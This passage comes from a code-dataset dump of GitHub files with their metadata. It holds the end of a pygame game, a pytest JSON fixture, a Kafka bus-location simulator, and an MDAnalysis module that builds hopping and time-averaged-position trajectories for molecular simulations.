screen.fill((255,255,255))\r\n screen.blit(background.image,background.rect)\r\n instructionMessage(\"[Press Space to Punch][Left and Right Arrown Keys to Move]\")\r\n killMessage(\"Kills : \" + str(player.kills))\r\n missMessage(\"Miss : \" + str(player.miss))\r\n allSprite.update()\r\n allSprite.draw(screen)\r\n for obs in pygame.sprite.spritecollide(player,obstacles,0):\r\n if obs.direction == player.direction and player.punching:\r\n obs.kill()\r\n player.kills += 1\r\n else:\r\n obs.kill()\r\n player.miss += 1\r\n pygame.display.flip()\r\n clock.tick(30)\r\npygame.quit()\r\n\r\n\r\n","repo_name":"lloydescoto/Agent-Arcade","sub_path":"Arcade/FN-Arcade.py","file_name":"FN-Arcade.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6960173530","text":"import json\n\nimport pytest\n\n\n@pytest.fixture()\ndef read_method():\n with open('URL.json') as read_data:\n read_methoddata = json.load(read_data)\n return read_methoddata\n\n@pytest.fixture()\n\ndef readpostData():\n with open('postData.json','r') as read_data:\n read_methoddata = read_data.read()\n request_json=json.loads(read_methoddata)\n print(request_json)\n return request_json","repo_name":"nag14my3/APITesting","sub_path":"readConfigFile.py","file_name":"readConfigFile.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22281776170","text":"import json\nimport time\nimport itertools\n\nimport utils\nfrom kafka import producer\n\n\nclass Bus:\n def __init__(self, number: int, coordinates: itertools.cycle):\n self._producer = producer.Producer()\n self.number = number\n self.coordinates = coordinates\n\n def run(self) -> None:\n for coordinate in self.coordinates:\n self._producer.produce(json.dumps({\n \"bus_number\": self.number,\n \"key\": f\"{self.number}_{utils.generate_uuid()}\",\n \"latitude\": coordinate[1],\n \"longitude\": coordinate[0],\n }).encode('ascii'))\n time.sleep(1)\n\n\nif __name__ == '__main__':\n input_file = open('data/bus25.json')\n json_array = json.load(input_file)\n coordinates = itertools.cycle(\n json_array['features'][0]['geometry']['coordinates']\n )\n bus = Bus(25, coordinates)\n bus.run()\n","repo_name":"tamkovich/25BUS-FROM-HOME-TO-EPAM","sub_path":"bus.py","file_name":"bus.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11282196528","text":"from __future__ import absolute_import, with_statement\n\nimport warnings\n\nimport numpy\nimport MDAnalysis\nimport MDAnalysis.coordinates\nfrom MDAnalysis.lib.log import ProgressMeter\n\nfrom .exceptions import SelectionError\nfrom .constants import SITELABEL\nfrom . import utilities\nfrom .utilities import msg, set_verbosity\n\n\nimport logging\nlogger = logging.getLogger(\"MDAnalysis.app.hop.trajectory\")\n\nclass HoppingTrajectory(object):\n \"\"\"Provides a time-sequence of sites visited by individual molecules,\n called a 'hopping trajectory' because the molecules hop between\n sites. Their coordinates are mapped to site labels, which have been defined\n on a grid previously (using hop.sitemap).\n\n :Output format:\n\n For simplicity and code reusal this is again a dcd with the site as the\n x-coordinate; the y coordinate is set to the 'orbit site', i.e. it records\n the site the particle was last at for as long as it does not enter a new\n site. It describes the site in whose 'basin of attraction' the particle\n orbits. Note, however, that the transition to a new site is still counted\n as belonging to the previous site (which is arguably incorrect); the\n hop.graph module, however, does a proper analysis, which is cannot be done\n here for efficieny reasons. The z field is unused at the moment and set to\n 0.\n\n :Attributes:\n\n ts MDAnalysis.Timestep object\n n_frames number of frames in hopping trajectory\n group AtomGroup of atoms that are tracked\n\n\n :Methods:\n\n ## [start:stop] object can be used as an iterator over the\n ## hopping trajectory (disabled du to problems when doing random\n ## access on large dcds; either a bug in DCDReader or python)\n next() advances time step in the hopping trajectory\n map_dcd() iterator that updates the ts and maps the trajectory\n coordinates to site labels\n _map_next_timestep() map next coordinate trajectory step to hopping time step\n _read_next_timestep() read next timestep from hopping trajectory\n\n\n write() write the hopping trajectory to a dcd file + psf\n write_psf() write a dummy psf for visualization\n \"\"\"\n\n def __init__(self,trajectory=None,group=None,density=None,\n filename=None,hopdcd=None,hoppsf=None,fixtrajectory=None,verbosity=3):\n \"\"\"Converts a trajectory into a hopping trajectory, using a sitemap as an index for sites.\n\n >>> h = HoppingTrajectory(trajectory=DCDReader,group=AtomGroup,density=Density,\n fixtrajectory=,verbosity=3)\n >>> h = HoppingTrajectory(filename=)\n\n Create from a coordinate trajectory of a group of atoms and a site map:\n\n u = MDAnalysis.Universe(psf,dcd)\n water = u.select_atoms('name OH2')\n h = HoppingTrajectory(trajectory=u.trajectory,group=water,density=water_density)\n\n Load from a saved hopping trajectory (in dcd format with dummy psf)\n\n h = HoppingTrajectory(hopdcd='hops.trajectory',hoppsf='hops.psf')\n\n :Arguments:\n\n trajectory MDAnalysis.trajectory trajectory instance\n group MDAnalysis.group instance\n density grid3Dc.Grid instance with sitemap set\n\n hopdcd dcd written by write()\n hoppsf psf written by write() (or write_psf())\n filename or simply provide one filename prefix for psf and dcd\n\n fixtrajectory dictionary with attributes of a dcd object and new\n values; used to provide correct values after using\n a catdcd-generated trajectory (hack!), e.g.\n fixtrajectory = {'delta':10.22741474887299}\n\n verbosity show status messages for >= 3\n \"\"\"\n self.verbosity = verbosity\n set_verbosity(self.verbosity)\n\n if not (trajectory is None or group is None or density is None):\n self.traj = trajectory # MDAnalysis.Universe.trajectory\n try:\n self.tgroup = group.atoms # atom selection for trajectory\n except AttributeError:\n raise TypeError('group must be a , eg MDAnalyis.Universe.select_atoms().')\n if len(self.tgroup) == 0:\n raise ValueError(\"Group contains 0 particles, should be >0\")\n\n # for writing a pseudo PSF we want atom attributes: mass, type, charge\n u = self.tgroup.universe\n if not hasattr(self.tgroup, \"charges\"):\n u.add_TopologyAttr(\n MDAnalysis.core.topologyattrs.Charges(numpy.zeros(len(u.atoms))))\n if not hasattr(self.tgroup, \"masses\"):\n u.add_TopologyAttr(\n MDAnalysis.core.topologyattrs.Masses(numpy.ones(len(u.atoms))))\n if not hasattr(self.tgroup, \"types\"):\n u.add_TopologyAttr(\n MDAnalysis.core.topologyattrs.Types(numpy.array(['O'] * len(u.atoms))))\n\n if isinstance(fixtrajectory,dict):\n for attr,val in fixtrajectory.items():\n if not hasattr(trajectory,attr):\n raise AttributeError('fixtrajectory: dcd object does not have attribute \"'\\\n +str(attr)+'\"')\n trajectory.__dict__[attr] = val\n self.totaltime = trajectory.totaltime\n self.traj.rewind() # make sure to start from frame 0\n self._GD = density # sitemap.Density object\n self.map = self._GD.map # map of sites\n self.edges = self._GD.edges # N+1 edges of bins\n self.dedges = map(numpy.diff,self.edges) # N bin widths\n try:\n if not self._GD.grid.shape == self.map.shape:\n raise ValueError\n except (AttributeError,ValueError):\n raise ValueError(\"The density object must have its site map computed.\")\n Dmap = numpy.ndim(self.map)\n coord = numpy.asarray(self.tgroup.positions)\n Natoms,D = coord.shape\n if not D == Dmap:\n raise ValueError(\"Coordinates and map have different dimensions.\")\n # NOTE:\n # Any count outside the histogram becomes 'outlier' so\n # one should take care to choose a large enough map for the region\n # of interest. See _coord2hop().\n self.buffered_map = SITELABEL['outlier'] * \\\n numpy.ones(tuple(numpy.asarray(self.map.shape) + 2))\n\n # Here we commit to writing a DCD hopping trajectory:\n self._ts = MDAnalysis.coordinates.base.Timestep(Natoms) # empty time step for N atoms\n self._ts.frame = self.traj.ts.frame # current frame\n numlabels = float(self.map.max() - self.map.min() + 2) # naive... but not crucial\n # fake unit cell for visualization\n self._ts.dimensions = [numlabels, numlabels, 1, 90, 90, 90]\n # access self.ts through managed property\n # current hopping trajectory frame is in ts._pos[]\n # _pos = numpy.empty(coord.shape) # x=site label y=s(t)==0?s(t-1):s(t) z=0\n self.n_frames = self.traj.n_frames # total numer of frames\n self.hoptraj = None # no hopping trajectory available\n self._init_coord2hop() # init for _map_next_timestep()\n self._map_next_timestep() # initialize with first timestep\n elif not (hopdcd is None or hoppsf is None) or filename is not None:\n # read from dcd\n try:\n self.traj,self.tgroup,self.map,self.edges,self.dedges\n except AttributeError:\n self.traj,self.tgroup,self.map,self.edges,self.dedges = [None] * 5\n if filename is not None:\n hoppsf = self.filename(filename,'psf')\n hopdcd = self.filename(filename,'dcd')\n u = MDAnalysis.Universe(hoppsf,hopdcd)\n group = u.atoms\n if u.atoms.n_atoms == 0:\n raise ValueError(\"Hop trajectory contains 0 particles.\")\n self.group = group # group that refers to hopping trajectory\n self.hoptraj = u.trajectory # DCD(!) trajectory object\n # use property self.ts to access self.hoptraj.ts\n self.n_frames = self.hoptraj.n_frames\n self.totaltime = self.hoptraj.totaltime\n else:\n raise ValueError('Not sufficient data to create a hopping trajectory.')\n\n filename = utilities.filename_function\n\n @property\n def ts(self):\n \"\"\"Timestep of the hoptraj\"\"\"\n if self.hoptraj:\n return self.hoptraj.ts\n else:\n return self._ts\n\n @ts.setter\n def ts(self, x):\n if self.hoptraj:\n raise AttributeError(\"Cannot modify the loaded hoptraj.ts\")\n else:\n self._ts = x\n\n def next(self):\n \"\"\"Provides the next time step of a hopping trajectory.\n\n ts = next()\n\n If a hopping trajectory file exists then this is\n used. Otherwise, the coordinate trajectory is mapped on the\n fly (which is computationally more expensive).\n \"\"\"\n if self.hoptraj:\n nextTS = self._read_next_timestep\n else:\n nextTS = self._map_next_timestep\n return nextTS()\n\n def _map_next_timestep(self):\n \"\"\"Read next timestep from coordinate trajectory and set up the\n hopping trajectory time step\n \"\"\"\n return self._coord2hop(self.traj.next())\n\n def _read_next_timestep(self):\n \"\"\"Read next time step from hopping trajectory\"\"\"\n return self.hoptraj.next()\n\n def write(self,filename,start=None,step=None,delta=None,load=True):\n \"\"\"Write hopping trajectory as standard dcd file, together with a minimal psf.\n\n write('hop')\n\n Arguments:\n\n load = True Immediately loads the trajectory so that further\n calls to next() will use the computed\n trajectory and don't use expensive mapping.\n\n Ignore the other options and leave them at the\n defaults. Currently, only the whole trajectory is written. For\n visualization one also needs the dummy psf of the group.\n\n Results:\n\n filename.trajectory and filename.psf\n\n Note that it is your responsibility to load the hopping\n trajectory and the appropriate psf together as there is very\n limited information stored in the dcd itself.\n \"\"\"\n set_verbosity(self.verbosity) # this is stupid\n\n psfname = self.filename(filename,'psf')\n dcdname = self.filename(filename,'dcd')\n\n pm = ProgressMeter(self.n_frames, interval=10,\n format=\"Mapping frame %(step)5d/%(numsteps)6d [%(percentage)5.1f%%]\\r\")\n with MDAnalysis.Writer(dcdname, n_atoms=self.ts.n_atoms,\n dt=self.traj.dt,\n remarks='Hopping trajectory: x=site y=orbit_site z=0') as dcdwriter:\n for ts in self.map_dcd():\n dcdwriter.write_next_timestep(ts)\n pm.echo(ts.frame)\n logger.info(\"HoppingTrajectory.write(): wrote hoptraj %r.\", dcdname)\n\n self.write_psf(psfname)\n logger.info(\"HoppingTrajectory.write(): wrote hoppsf %r.\", psfname)\n\n if load is True:\n self.__init__(filename=filename,verbosity=self.verbosity)\n\n def write_psf(self,filename):\n \"\"\"Write a dummy psf just for the atoms in the selected group\n so that one can visualize the hopping trajectory.\n\n write_psf(filename)\n\n The psf is NOT a fully functional psf. It only contains the\n header and the ATOMS section. It is sufficient to display the\n hopping trajectory in VMD and can be read in by the MDAnalysis\n tools in order to store the atom numbers for the hopping\n trajectory.\n\n ------\n notes\n ------\n Format from psffres.src\n\n CHEQ:\n II,LSEGID,LRESID,LRES,TYPE(I),IAC(I),CG(I),AMASS(I),IMOVE(I),ECH(I),EHA(I)\n\n standard format:\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,I4,1X,2G14.6,I8,2G14.6)\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,A4,1X,2G14.6,I8,2G14.6) XPLOR\n expanded format EXT:\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,I4,1X,2G14.6,I8,2G14.6)\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,A4,1X,2G14.6,I8,2G14.6) XPLOR\n\n no CHEQ:\n II,LSEGID,LRESID,LRES,TYPE(I),IAC(I),CG(I),AMASS(I),IMOVE(I)\n\n standard format:\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,I4,1X,2G14.6,I8)\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,A4,1X,2G14.6,I8) XPLOR\n expanded format EXT:\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,I4,1X,2G14.6,I8)\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,A4,1X,2G14.6,I8) XPLOR\n \"\"\"\n # Standard no CHEQ format:\n psf_ATOM_format = '%(iatom)8d %(segid)4s %(resid)-4d %(resname)4s '+\\\n '%(name)-4s %(type)4s %(charge)-14.6f%(mass)-14.4f%(imove)8d\\n'\n # This produces:\n # 2114 XWAT 1 TIP3 OH2 75 -0.834000 15.9994 0\n # For some reason, I don't get the same output as I get from Charmm because\n # Charmm centers the value whereas I can only left or right-align them.\n # (This is not a problem as the fields are properly lined up!)\n # 2114 XWAT 1 TIP3 OH2 75 -0.834000 15.9994 0\n\n # EXT (no CHEQ) format (read by MDAnalysis.topology.PSFParser)\n #expanded format EXT:\n # (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,I4,1X,2G14.6,I8) charmm\n # II SEGID RESID RESNM ANAME TYPE CHARGE MASS IMOVE\n\n psf_EXT_ATOM_format = \\\n '%(iatom)10d %(segid)8s %(resid)-8d %(resname)8s ' \\\n '%(name)-8s %(type)4s %(charge)-14.6f%(mass)-14.4f%(imove)8d\\n'\n\n with open(filename,'w') as psf:\n psf.write('PSF EXT\\n\\n')\n psf.write('%7d !NTITLE\\n' % 3)\n psf.write('* Hopping trajectory written by hop.trajectory.HoppingTrajectory.write()\\n'\n '* See https://github.com/Becksteinlab/hop\\n'\n '* This is NOT a fully functional psf but should work for visualization.\\n')\n psf.write('\\n')\n\n psf.write('%10d !NATOM\\n' % len(self.tgroup))\n imove = 0 # no fixed atoms\n for atom in self.tgroup:\n # add +1 to atom.number (zero-index but Charmm is 1-indexed) (see PSFParser.py)\n psf.write(psf_EXT_ATOM_format %\n {'iatom':atom.index+1, 'segid':atom.segid[:8], 'resid':atom.resid,\n 'resname':atom.resname[:8], 'name':atom.name[:8], 'type':atom.type,\n 'charge':atom.charge, 'mass':atom.mass,'imove':imove} )\n # emergency stop if we cannot handle the size of the system\n if atom.resid >= 10**8 or atom.index+1 >= 10**10:\n raise NotImplementedError(\"Sorry, too many atoms (%d) or resids (%d) for the standard \"\n \"PSF format. File a bug at http://github.com/Becksteinlab/hop/issues\"\n % (atom.index+1, atom.resid))\n # ignore all the other sections (enough for MDAnalysis, VMD, and me)\n\n\n def map_dcd(self, start=None, stop=None, step=None):\n \"\"\"Generator to read the trajectory from start to stop and map\n positions to sites.\n\n ts = map_dcd(**kwargs)\n\n Arguments:\n start starting frame number (None means first)\n stop last frame to read (exclusive) (None means last)\n (Those are arguments to dcd[start:stop].)\n Iterator Returns:\n ts hopping trajectory timestep object (iterator)\n \"\"\"\n self._init_coord2hop()\n for traj_ts in self.traj[start:stop:step]:\n yield self._coord2hop(traj_ts)\n\n def _init_coord2hop(self):\n \"\"\"Allocate helper arrays for _coord2hop()\"\"\"\n # initialization with 'interstitial' is CRUCIAL: throws away first frame\n # and makes sure that we don't keep spurious sites from 1st frame around\n self._sites_last = SITELABEL['interstitial'] * numpy.ones(self.tgroup.n_atoms)\n self._offsites = numpy.empty(self.tgroup.n_atoms,dtype=bool)\n\n def _coord2hop(self,ts):\n \"\"\"Translate a single trajectory coordinate frame into a hopping\n trajectory frame and updates the hopping trajectory frame.\n\n :Arguments:\n ts\n :class:`~MDAnalysis.coordinates.base.Timestep` time step object (input coordinate data)\n\n :Returns: hopping ts; Timestep object for the _selected_ atoms with (x=sites y=orbit site z=0)\n (also updates self.ts so that the HoppingTrajectory instance is uptodate.)\n \"\"\"\n self.ts.frame = ts.frame # update the hopping time step\n coords = numpy.asarray(self.tgroup.positions)\n N,D = coords.shape\n\n # Basic nD histograming code from numpy.histogramdd:\n #\n # digitize returns i such that bins[i-1] <= x < bins[i]\n # outliers: i=0 or i=len(bins).\n #\n # indices[] are NOT map[] indices: to remove the two outlier\n # bins (in the logic of digitize()) we would have to subtract\n # 1 later and also remove indices belonging to outliers. We\n # cheat and add outlier bins to the map (buffered_map[]) and\n # simply label outliers in the trajectory.\n indices = [numpy.digitize(coords[:,i], self.edges[i]) for i in xrange(D)]\n\n # Using digitize, values that fall on an edge are put in the right bin.\n # For the rightmost bin, we want values equal to the right\n # edge to be counted in the last bin, and not as an outlier.\n for i in xrange(D):\n # Rounding precision\n decimal = int(-numpy.log10(self.dedges[i].min())) +6\n # Find which points are on the rightmost edge.\n on_edge = numpy.where(\n numpy.around(coords[:,i], decimal) == \\\n numpy.around(self.edges[i][-1], decimal))[0]\n # Shift these points one bin to the left.\n indices[i][on_edge] -= 1\n\n # indices contains the outliers at index 0 and len(edges[i])\n # To make things simpler, we expand the map with a outlier zone,\n # label outliers with -1 and then index into the buffered_map\n\n # fill the core of the buffered map\n core = D*[slice(1,-1)]\n self.buffered_map[core] = self.map # not very expensive\n\n # Note that now indices[m] corresponds to group[m]\n # (It's important that the order is preserved)\n # The group is not needed right now, though.\n #\n # pos[:,0] = site(t), pos[:,1] = orbit site, pos[:,2] = 0 (unused)\n pos = self.ts._pos # assign slices to avoid loop (thanks to Naveen)\n pos[:,0] = [self.buffered_map[indices[0][iatom],indices[1][iatom],indices[2][iatom]] \\\n for iatom in xrange(N)]\n s = pos[:,0]\n self._offsites[:] = (s == SITELABEL['interstitial']) | (s == SITELABEL['outlier'])\n pos[:,1] = s # particles in interstital and outliers are assigned their previous site\n pos[self._offsites,1] = self._sites_last[self._offsites]\n pos[:,2] = 0\n\n # _sites_last[] was initialized to 'interstitial': this ensures proper accounting\n # for all later steps (because 'interstitial' is thrown away at the analysis stage)\n self._sites_last[:] = pos[:,1] # save orbit sites for next step\n return self.ts\n\n def iterator(self):\n return self.__iter__()\n\n def __iter__(self):\n if self.hoptraj:\n for ts in self.hoptraj:\n yield ts\n else:\n self._init_coord2hop()\n for traj_ts in self.traj:\n yield self._coord2hop(traj_ts)\n\nclass TAPtrajectory(object):\n \"\"\"Provides a Time-Averaged Position (TAP) version of the input trajectory.\n\n The method is described in Henchman and McCammon, J Comp Chem 23\n (2002), 861 doi:10.1002/jcc.10074\n\n :Attributes:\n ts MDAnalysis.Timestep object\n n_frames number of frames in TAP trajectory\n group AtomGroup of atoms that are tracked\n\n\n :Methods:\n\n ## [start:stop] object can be used as an iterator over the\n ## hopping trajectory (disabled due to dcdreader bug)\n next() advances time step in the hopping trajectory\n map_dcd() iterator that updates the ts and maps the trajectory\n coordinates to site labels\n _map_next_timestep() map next coordinate trajectory step to hopping time step\n _read_next_timestep() read next timestep from hopping trajectory\n\n write() write the hopping trajectory to a dcd file + psf\n \"\"\"\n\n def __init__(self,trajectory=None,group=None,TAPradius=2.8,TAPsteps=3,\n filename=None,dcd=None,psf=None,fixtrajectory=None,verbosity=3):\n \"\"\"A TAP trajectory object converts a trajectory into a TAP trajectory.\n\n Create from a coordinate trajectory of a group of water residues:\n\n u = MDAnalysis.Universe(psf,dcd)\n water = u.select_atoms('resname TIP*') # see NOTE below!!\n water = u.select_atoms('name OH2') # better, see NOTE below!!\n h = TAPtrajectory(trajectory=u.trajectory,group=water)\n\n Load from a saved hopping trajectory (in dcd format with dummy psf)\n\n h = TAPtrajectory(dcd='TAP.trajectory',psf='TAP.psf')\n\n The given atom group is filtered according to the Time-Averaged Positon\n algorithm (Henchman and McCammon, J Comp Chem 23 (2002), 861). Original\n positions are replaced by their TAPs: A particles last position (TAP)\n is retained unless it has moved farther than TAPradius from its TAP\n measured by its root mean square distance over the last TAPsteps\n frames.\n\n One can use a TAP filtered trajectory 'on-the-fly' to build the density:\n\n u = Universe(psf,dcd)\n oxy = u.select_atoms('name OH2')\n TAP = TAPtrajectory(u.trajectory,oxy)\n u.trajectory = TAP.trajectory # <--- replace orig dcd with TAP !!\n dens = hop.density.density_from_Universe(u,atomselection='name OH2')\n\n NOTE: In the current implementation residues are often ripped apart\n because all coordinates are processed independently. It is recommended\n to only do TAP on the water oxygens (for speed). This will create a\n trajectory in which hydrogens are always ripped from the oxygen but\n this trajectory is ONLY being used for creating a density from those\n oxygen using hop.sitemap.build_density().\n\n (This could be fixed at the cost of speed; in this case TAP would be done\n on the centre of mass and the whole residue would be translated.)\n\n :Arguments:\n\n trajectory MDAnalysis.trajectory trajectory instance\n group MDAnalysis.group instance (from the same Universe as trajectory)\n TAPradius particles are considered to be on the TAP as long as they\n haven't moved farther than TAPradius over the last TAPsteps frames\n TAPsteps RMS distance of particle from TAP over TAPsteps is compared\n to TAPradius\n dcd dcd written by write()\n psf psf written by write() (or write_psf())\n filename or simply provide one filename prefix for psf and dcd\n\n fixtrajectory dictionary with attributes of a dcd object and new\n values; used to provide correct values after using\n a catdcd-generated trajectory (hack!), e.g.\n fixtrajectory = {'delta':10.22741474887299}\n\n verbosity show status messages for >= 3\n \"\"\"\n self.verbosity = verbosity\n set_verbosity(self.verbosity)\n\n if not (trajectory is None or group is None):\n self.traj = trajectory # MDAnalysis.Universe.trajectory\n self.tgroup = group # atom selection for trajectory\n self.tgroup_indices = self.tgroup.indices() # cache indices\n if not isinstance(self.tgroup,MDAnalysis.core.AtomGroup.AtomGroup):\n raise TypeError('group must be a , eg MDAnalyis.Universe.select_atoms().')\n self.universe = self.tgroup.atoms[0].universe # Universe of dcd and group (hackish..)\n if isinstance(fixtrajectory,dict):\n for attr,val in fixtrajectory.items():\n if not hasattr(trajectory,attr):\n raise AttributeError('fixtrajectory: dcd object does not have attribute \"'\\\n +str(attr)+'\"')\n trajectory.__dict__[attr] = val\n self.totaltime = trajectory.totaltime\n self.traj.rewind() # make sure to start from frame 0\n self.ts = self.traj.ts # output will look like input (no copy, see _coord2TAP!)\n self.TAPtraj = None # no TAP trajectory available\n self.TAPradius = TAPradius\n self.TAPsteps = TAPsteps\n # store last TAPsteps in __lastframes\n self.__lastframes = utilities.Ringbuffer(self.TAPsteps)\n # store the last TAP coordinates: initialized here\n self.__currentTAP = self.tgroup.positions.copy()\n # fake DCD object that can be slotted into another universe\n self.dcd_attributes = {}\n for k in ['delta','filename','fixed','n_frames',\n 'n_atoms','periodic','remarks',\n 'skip','skip_timestep','start_timestep']:\n self.dcd_attributes[k] = self.traj.__dict__[k]\n self.trajectory = ThinDCDReader(self)\n self.n_frames = self.dcd_attributes['n_frames']\n elif not (dcd is None or psf is None) or filename is not None:\n # read from dcd\n try:\n self.traj,self.tgroup\n except AttributeError:\n self.traj,self.tgroup = [None] * 2\n if filename is not None:\n psf = self.filename(filename,'psf')\n dcd = self.filename(filename,'dcd')\n u = MDAnalysis.Universe(psf,dcd)\n group = u.select_atoms('type *') # TODO: why do I need this?\n self.group = group # group that refers to hopping trajectory\n self.TAPtraj = u.trajectory # DCD trajectory object\n self.ts = self.TAPtraj.ts\n self.n_frames = self.TAPtraj.n_frames\n self.totaltime = self.TAPtraj.totaltime\n # DCD object that can be slotted into another universe\n self.trajectory = u.trajectory\n else:\n raise ValueError('Not sufficient data to create a TAP trajectory.')\n\n filename = utilities.filename_function\n\n def next(self):\n \"\"\"Provides the next time step of a TAP trajectory.\n\n ts = next()\n\n If a TAP trajectory file exists then this is used. Otherwise,\n the coordinate trajectory is mapped on the fly (which is\n computationally more expensive).\n \"\"\"\n if self.TAPtraj:\n nextTS = self._read_next_timestep\n else:\n nextTS = self._map_next_timestep\n return nextTS()\n\n def rewind(self):\n if self.TAPtraj:\n self.TAPtraj.rewind()\n else:\n self.traj.rewind()\n\n def _map_next_timestep(self):\n \"\"\"Read next timestep from coordinate trajectory and set up the\n TAP trajectory time step\n \"\"\"\n return self._coord2TAP(self.traj.next())\n\n def _read_next_timestep(self):\n \"\"\"Read next time step from a TAP trajectory on disk\"\"\"\n return self.TAPtraj.next()\n\n def write(self,filename,start=None,step=None,delta=None,load=True):\n \"\"\"Write hopping trajectory as standard dcd file.\n\n write('TAP')\n\n :Arguments:\n\n load = True Immediately loads the trajectory so that further\n calls to next() will use the computed\n trajectory and don't use expensive mapping.\n\n Ignore the other options and leave them at the defaults. Currently,\n only the whole trajectory is written. All atoms in the original\n trajectory are written to the output so you should be able to use your\n original psf file.\n\n NOTE: Fixed atoms are possibly not accounted for properly.\n\n Note that it is your responsibility to load the TAP trajectory and the\n appropriate psf together as there is very limited information stored in\n the dcd itself.\n \"\"\"\n set_verbosity(self.verbosity) # this is stupid\n\n psfname = self.filename(filename,'psf')\n dcdname = self.filename(filename,'dcd')\n\n # see MDAnalysis/src/dcd/dcd.c for explanations\n if start is None:\n start = self.traj.start_timestep # starting time step for DCD file\n if step is None:\n step = self.traj.skip_timestep # NSAVC (# ts between written DCD frames)\n if delta is None:\n delta = self.traj.delta # length of ts (AKMA units)\n\n dcdwriter = MDAnalysis.DCD.DCDWriter(dcdname,self.ts.n_atoms,\n start,step,delta,\n remarks='TAP trajectory')\n pm = ProgressMeter(self.n_frames, interval=10,\n format=\"Mapping TAP frame %(step)5d/%(numsteps)6d [%(percentage)5.1f%%]\\r\")\n for ts in self.map_dcd():\n dcdwriter.write_next_timestep(ts)\n pm.echo(ts.frame)\n dcdwriter.close()\n logger.info(\"TAPTrajectory.write(): wrote TAP traj %r.\", dcdname)\n\n if load is True:\n self.TAPtraj = MDAnalysis.DCD.DCDReader(dcdname)\n self.trajectory = self.TAPtraj\n\n def map_dcd(self,start=None,stop=None,skip=1):\n \"\"\"Generator to read the trajectory from start to stop and map\n positions to TAP sites.\n\n ts = map_dcd(**kwargs)\n\n Arguments:\n start starting frame number (None means first)\n stop last frame to read (exclusive) (None means last)\n (Those are arguments to dcd[start:stop].)\n Iterator Returns:\n ts hopping trajectory timestep object (iterator)\n \"\"\"\n # note: iterator + loop is slower than direct loop so I may\n # implement other functions directly with loops and leave the\n # iterator for the user\n if start is not None or stop is not None:\n raise NotImplemented('start/stop do not work on big trajectories')\n if start is None:\n start = 0\n if stop is None:\n stop = self.n_frames\n\n #for traj_ts in self.traj[start:stop]:\n for traj_ts in self.traj: # no slicing for big trajectories(ERRORS!)\n yield self._coord2TAP(traj_ts)\n\n def _coord2TAP(self,ts):\n \"\"\"Translate a single trajectory coordinate frame into a TAP\n trajectory frame and update the TAP trajectory frame.\n\n ts MDAnalysis.trajectory.ts time step object\n\n Only the selection's coordinates are TAP-filtered.\n :Returns:\n\n hopping ts\n \"\"\"\n # Modify the original frame in place and use it as the new frame. This\n # should work in most instances unless one wants to immediately compare old\n # and new frame.\n self.ts = ts # update the TAP time step\n\n # only work on the selected coordinates (memory efficiency but\n # slower??) (I didn't manage to always work on a reference to the\n # coords; this would avoid having to patch back the altered coordinates\n # into the whole coord set, see below.)\n coords = self.tgroup.positions # makes a new copy\n self.__lastframes.append(coords.copy()) # remember last TAPsteps frames\n\n # calculated RMS distance for last TAPsteps from current TAP for all coords\n # (current coords are part of the running average over __lastframes)\n # __currentTAP is initialized in __init__ to the first frame\n d = numpy.average(\n numpy.sqrt(\n numpy.sum((numpy.asarray(self.__lastframes) - self.__currentTAP), axis=0)**2),\n axis=1)\n onTAP = (d <= self.TAPradius) # particles that did not move far\n coords[onTAP] = self.__currentTAP[onTAP] # reset to TAP\n self.__currentTAP[:] = coords # remember TAP for next frame\n # patch selected coordinates back into full coordinate set\n # u.trajectory.ts._pos[w.indices()] = new_coord_array # WORKS (no copy)\n # x = u.trajectory.ts._pos[w.indices()] # FAILS (copy involved)\n # x[:] = new_coord_array[:] #\n self.ts._pos[self.tgroup_indices] = self.__currentTAP\n return self.ts\n\n def iterator(self):\n return self.__iter__()\n\n def __iter__(self):\n if self.TAPtraj:\n for ts in self.TAPtraj:\n yield ts\n else:\n for traj_ts in self.traj:\n yield self._coord2TAP(traj_ts)\n\n\n\n\n\n# move to MDAnalysis & make it work with 0.6.2\nclass ThinDCDReader(MDAnalysis.coordinates.DCD.DCDReader):\n \"\"\"DCD-like object that supports a subsection of the DCDReader\n interface such as iteration over frames and most attributes. The\n important part is that the __iter__() method is overriden to\n provide data from another source. This allows a filter architecture\n for trajectories.\"\"\"\n # Right now specifically designed for TAPtrajectory class.\n def __init__(self,datafeeder):\n D = datafeeder\n # should have as attributes:\n # ['dcdfilename','delta','filename','fixed','n_frames', 'numatoms','periodic',\n # 'remarks', 'skip','skip_timestep','start_timestep']\n self.__dict__.update(D.dcd_attributes)\n self.dcdfile = None # no file is linked; with None, __del__ will be happy\n # use the classes/methods from the feeder class:\n self.ts = D.ts\n self.__iter__ = D.__iter__\n self.next = D.next # feeder needs next()\n self.rewind = D.rewind\n def __getitem__(self,frame):\n \"\"\"Slow sequential 'read forward' implementation.\"\"\"\n for ts in self:\n if ts.frame == frame+1: # frames are 1-based\n break\n return ts\n def timeseries(self,*args,**kwargs):\n raise NotImplementedError\n def correl(self,*args,**kwargs):\n raise NotImplementedError\n def close_trajectory(self):\n pass\n\n\n","repo_name":"Becksteinlab/hop","sub_path":"hop/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":35440,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"40193130413","text":"#\n# AFS Server management toolkit: Find ownership of entry\n# -*- coding: utf-8 -*-\n#\n\n__copyright__ = \"\"\"\nCopyright (C) 2014 Red Hat, Inc. All Rights Reserved.\nWritten by David Howells (dhowells@redhat.com)\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public Licence version 2 as\npublished by the Free Software Foundation.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty 